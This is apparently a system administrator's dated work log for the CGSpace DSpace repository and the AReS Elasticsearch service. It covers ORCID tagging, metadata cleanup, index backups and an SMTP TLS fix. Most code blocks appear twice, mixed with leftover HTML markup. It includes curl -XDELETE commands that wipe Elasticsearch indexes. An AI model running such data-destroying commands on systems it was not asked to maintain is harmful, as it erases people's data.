</span></span><span style="display:flex;"><span>&#34;Urioste Daza, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
</span></span><span style="display:flex;"><span>&#34;Urioste, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
</span></span><span style="display:flex;"><span>&#34;Villegas, Daniel&#34;,Daniel M. Villegas: 0000-0001-6801-3332
</span></span><span style="display:flex;"><span>&#34;Villegas, Daniel M.&#34;,Daniel M. Villegas: 0000-0001-6801-3332
</span></span><span style="display:flex;"><span>&#34;Giles, James&#34;,James Giles: 0000-0003-1899-9206
</span></span><span style="display:flex;"><span>&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
</span></span><span style="display:flex;"><span>&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
</span></span><span style="display:flex;"><span>&#34;Simbare, A.&#34;,Alice Simbare: 0000-0003-2389-0969
</span></span><span style="display:flex;"><span>&#34;Dita Rodriguez, Miguel&#34;,Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
</span></span><span style="display:flex;"><span>&#34;Templer, Noel&#34;,Noel Templer: 0000-0002-3201-9043
</span></span><span style="display:flex;"><span>&#34;Jalonen, R.&#34;,Riina Jalonen: 0000-0003-1669-9138
</span></span><span style="display:flex;"><span>&#34;Jalonen, Riina&#34;,Riina Jalonen: 0000-0003-1669-9138
</span></span><span style="display:flex;"><span>&#34;Izquierdo, Paulo&#34;,Paulo Izquierdo: 0000-0002-2153-0655
</span></span><span style="display:flex;"><span>&#34;Reyes, Byron&#34;,Byron Reyes: 0000-0003-2672-9636
</span></span><span style="display:flex;"><span>&#34;Reyes, Byron A.&#34;,Byron Reyes: 0000-0003-2672-9636
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</span></span></code></pre></div><ul>
- I deployed the latest `6_x-prod` branch on CGSpace, ran all system updates, and rebooted the server
  - This included the IWMI changes, so I also migrated the `cg.subject.iwmi` metadata to `dcterms.subject` and deleted the subject term
- Lowercase the AGROVOC subjects that still contain uppercase characters:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 47405
</code></pre></div><ul>
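- To gauge the size of the problem before touching anything, the same predicate works as a read-only count (a sketch using the same field ID as above):

```console
dspace=# SELECT COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
```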
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
</span></span><span style="display:flex;"><span>UPDATE 47405
</span></span></code></pre></div><ul>
- That's interesting because we lowercased them all a few months ago, so these must all be new… wow
  - We have 405,000 total AGROVOC terms, with 20,600 of them being unique
- Export the top 5,000 AGROVOC terms to validate them:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
COPY 5000
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-05-20-agrovoc.csv| sed 1d &gt; /tmp/2021-05-20-agrovoc.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
$ csvgrep -c <span style="color:#e6db74">&#34;number of matches&#34;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2021-05-20-agrovoc-results.csv &gt; /tmp/2021-05-20-agrovoc-rejected.csv
</code></pre></div><ul>
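- The rejected file keeps the CSV header, so counting the actual rejected terms needs it stripped, the same `sed 1d` idiom as above (a sketch):

```console
$ sed 1d /tmp/2021-05-20-agrovoc-rejected.csv | wc -l
```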
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 5000
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-05-20-agrovoc.csv| sed 1d &gt; /tmp/2021-05-20-agrovoc.txt
</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#34;number of matches&#34;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2021-05-20-agrovoc-results.csv &gt; /tmp/2021-05-20-agrovoc-rejected.csv
</span></span></code></pre></div><ul>
- Meeting with Medha and Pythagoras about the FAIR Workflow tool
  - Discussed the need for such a tool, other tools being developed, etc
- Add ORCID identifiers for missing ILRI authors and tag 550 others based on a few authors I noticed that were missing them:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-05-24-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Patel, Ekta&#34;,&#34;Ekta Patel: 0000-0001-9400-6988&#34;
&#34;Dessie, Tadelle&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
&#34;Tadelle, D.&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
&#34;Dione, Michel M.&#34;,&#34;Michel Dione: 0000-0001-7812-5776&#34;
&#34;Kiara, Henry K.&#34;,&#34;Henry Kiara: 0000-0001-9578-1636&#34;
&#34;Naessens, Jan&#34;,&#34;Jan Naessens: 0000-0002-7075-9915&#34;
&#34;Steinaa, Lucilla&#34;,&#34;Lucilla Steinaa: 0000-0003-3691-3971&#34;
&#34;Wieland, Barbara&#34;,&#34;Barbara Wieland: 0000-0003-4020-9186&#34;
&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
&#34;Rao, Idupulapati M.&#34;,&#34;Idupulapati M. Rao: 0000-0002-8381-9358&#34;
&#34;Cardoso Arango, Juan Andrés&#34;,&#34;Juan Andrés Cardoso Arango: 0000-0002-0252-4655&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-05-24-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Patel, Ekta&#34;,&#34;Ekta Patel: 0000-0001-9400-6988&#34;
</span></span><span style="display:flex;"><span>&#34;Dessie, Tadelle&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
</span></span><span style="display:flex;"><span>&#34;Tadelle, D.&#34;,&#34;Tadelle Dessie: 0000-0002-1630-0417&#34;
</span></span><span style="display:flex;"><span>&#34;Dione, Michel M.&#34;,&#34;Michel Dione: 0000-0001-7812-5776&#34;
</span></span><span style="display:flex;"><span>&#34;Kiara, Henry K.&#34;,&#34;Henry Kiara: 0000-0001-9578-1636&#34;
</span></span><span style="display:flex;"><span>&#34;Naessens, Jan&#34;,&#34;Jan Naessens: 0000-0002-7075-9915&#34;
</span></span><span style="display:flex;"><span>&#34;Steinaa, Lucilla&#34;,&#34;Lucilla Steinaa: 0000-0003-3691-3971&#34;
</span></span><span style="display:flex;"><span>&#34;Wieland, Barbara&#34;,&#34;Barbara Wieland: 0000-0003-4020-9186&#34;
</span></span><span style="display:flex;"><span>&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
</span></span><span style="display:flex;"><span>&#34;Rao, Idupulapati M.&#34;,&#34;Idupulapati M. Rao: 0000-0002-8381-9358&#34;
</span></span><span style="display:flex;"><span>&#34;Cardoso Arango, Juan Andrés&#34;,&#34;Juan Andrés Cardoso Arango: 0000-0002-0252-4655&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><ul>
- A few days ago I took a backup of the Elasticsearch indexes on AReS using elasticdump:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span></code></pre></div><ul>
- The indexes look OK so I started a harvesting on AReS

## 2021-05-25
- The AReS harvest got messed up somehow, as I see the number of items in the indexes is the same as before the harvesting:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
yellow open openrxv-items-final soEzAnp3TDClIGZbmVyEIw 1 1 953 0 2.3mb 2.3mb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final soEzAnp3TDClIGZbmVyEIw 1 1 953 0 2.3mb 2.3mb
</span></span></code></pre></div><ul>
- Update all Docker images on the AReS server (linode20):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose -f docker/docker-compose.yml down
$ docker-compose -f docker/docker-compose.yml build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml build
</span></span></code></pre></div><ul>
- Then run all system updates on the server and reboot it
- Oh crap, I deleted everything on AReS and restored the backup, and the total items are now 104317… so it was actually correct before!
- For reference, this is how I re-created everything:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</code></pre></div><ul>
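- This delete/re-create/restore sequence comes up often enough in these notes that it might be worth wrapping in a small script; a minimal sketch (hypothetical filename, takes the mapping and data dumps as arguments, untested):

```console
$ cat reset-openrxv-indexes.sh
#!/usr/bin/env bash
# Hypothetical helper: re-create the AReS indexes and restore an elasticdump backup.
# Usage: ./reset-openrxv-indexes.sh mapping.json data.json
set -euo pipefail
curl -XDELETE 'http://localhost:9200/openrxv-items-final'
curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
curl -XPUT 'http://localhost:9200/openrxv-items-final'
curl -XPUT 'http://localhost:9200/openrxv-items-temp'
curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' \
    -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
elasticdump --input="$1" --output=http://localhost:9200/openrxv-items-final --type=mapping
elasticdump --input="$2" --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
```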
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</span></span></code></pre></div><ul>
- I will just start a new harvest… sigh

## 2021-05-26

- Looking in the DSpace log for this morning I see a big hole in the logs at that time (UTC+2 server time):
<pre tabindex="0"><code>2021-05-26 02:17:52,808 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
2021-05-26 02:17:52,853 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
<pre tabindex="0"><code>2021-05-26 02:17:52,808 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: &#39;10568/70659: item has country codes, skipping&#39;
2021-05-26 02:17:52,853 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: &#39;10568/66761: item has country codes, skipping&#39;
2021-05-26 03:00:05,772 INFO org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.spidersfile:null
2021-05-26 03:00:05,773 INFO org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.server:http://localhost:8081/solr/statistics
</code></pre><ul>
- And indeed the email seems to be broken:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace test-email
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
- To: fuuuuuu
- Subject: DSpace test email
- Server: smtp.office365.com
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
- Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
</span></span><span style="display:flex;"><span> - To: fuuuuuu
</span></span><span style="display:flex;"><span> - Subject: DSpace test email
</span></span><span style="display:flex;"><span> - Server: smtp.office365.com
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</span></span></code></pre></div><ul>
- I saw a recent thread on the dspace-tech mailing list about this that makes me wonder if Microsoft changed something on Office 365
  - I added `mail.smtp.ssl.protocols=TLSv1.2` to the `mail.extraproperties` in dspace.cfg and the test email sent successfully
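- For reference, the fix amounts to one line in dspace.cfg; a sketch of what the property might look like afterwards (any other comma-separated extra properties would be kept, only the TLS entry is the confirmed addition):

```console
# dspace.cfg (sketch): make JavaMail offer TLSv1.2 when STARTTLS upgrades the connection
mail.extraproperties = mail.smtp.ssl.protocols=TLSv1.2
```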

- The `angular_nginx` container on the AReS server wasn't running, so I simply started it and AReS was running again:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker-compose -f docker/docker-compose.yml start angular_nginx
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml start angular_nginx
</span></span></code></pre></div><ul>
- Margarita from CCAFS emailed me to say that workflow alerts haven't been working lately
  - I guess this is related to the SMTP issues last week
- The Elasticsearch indexes are messed up so I dumped and re-created them correctly:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XDELETE &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-final&#39;
</span></span><span style="display:flex;"><span>curl -XPUT &#39;http://localhost:9200/openrxv-items-temp&#39;
</span></span><span style="display:flex;"><span>curl -s -X POST &#39;http://localhost:9200/_aliases&#39; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
</span></span><span style="display:flex;"><span>elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
</span></span></code></pre></div><ul>
- Then I started a harvesting on AReS

## 2021-06-07

- Fix the ownership of the Elasticsearch data volume used by the OpenRXV containers:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
</code></pre></div><ul>
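- `podman unshare` runs a command inside the user namespace that rootless podman uses, so the `chown 1000:1000` makes the volume appear to be owned by UID 1000 from the container's point of view without needing root on the host; the mapped ownership can be double-checked the same way (a sketch):

```console
$ podman unshare ls -ln /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
```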
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
</span></span></code></pre></div><ul>
- The new OpenRXV harvesting method by Moayad uses pages of 10 items instead of 100 and it's much faster
  - I harvested 90,000+ items from DSpace Test in ~3 hours
- Checking how many handles are in the dump, and how many are unique:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | wc -l
90459
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq | wc -l
90380
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq -c | sort -h
...
2 &#34;10568/99409&#34;
2 &#34;10568/99410&#34;
2 &#34;10568/99411&#34;
2 &#34;10568/99516&#34;
3 &#34;10568/102093&#34;
3 &#34;10568/103524&#34;
3 &#34;10568/106664&#34;
3 &#34;10568/106940&#34;
3 &#34;10568/107195&#34;
3 &#34;10568/96546&#34;
</code></pre></div><h2 id="2021-06-20">2021-06-20</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>90459
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>90380
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> 2 &#34;10568/99409&#34;
</span></span><span style="display:flex;"><span> 2 &#34;10568/99410&#34;
</span></span><span style="display:flex;"><span> 2 &#34;10568/99411&#34;
</span></span><span style="display:flex;"><span> 2 &#34;10568/99516&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/102093&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/103524&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/106664&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/106940&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/107195&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/96546&#34;
</span></span></code></pre></div><h2 id="2021-06-20">2021-06-20</h2>
- Udana asked me to update their IWMI subjects from `farmer managed irrigation systems` to `farmer-led irrigation`
  - First I exported the IWMI community metadata:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
</span></span></code></pre></div><ul>
- Then I used `csvcut` to extract just the columns I needed and do the replacement into a new CSV:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,dcterms.subject[],dcterms.subject[en_US]&#39;</span> /tmp/2021-06-20-IWMI.csv | sed <span style="color:#e6db74">&#39;s/farmer managed irrigation systems/farmer-led irrigation/&#39;</span> &gt; /tmp/2021-06-20-IWMI-new-subjects.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dcterms.subject[],dcterms.subject[en_US]&#39;</span> /tmp/2021-06-20-IWMI.csv | sed <span style="color:#e6db74">&#39;s/farmer managed irrigation systems/farmer-led irrigation/&#39;</span> &gt; /tmp/2021-06-20-IWMI-new-subjects.csv
</span></span></code></pre></div><ul>
- Then I uploaded the resulting CSV to CGSpace, updating 161 items
- Start a harvest on AReS
- I found [a bug](https://jira.lyrasis.org/browse/DS-1977) and [a patch](https://github.com/DSpace/DSpace/pull/2584) for the private items showing up in the DSpace sitemap
- Checking the number of CGSpace handles in the AReS data:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | wc -l
90937
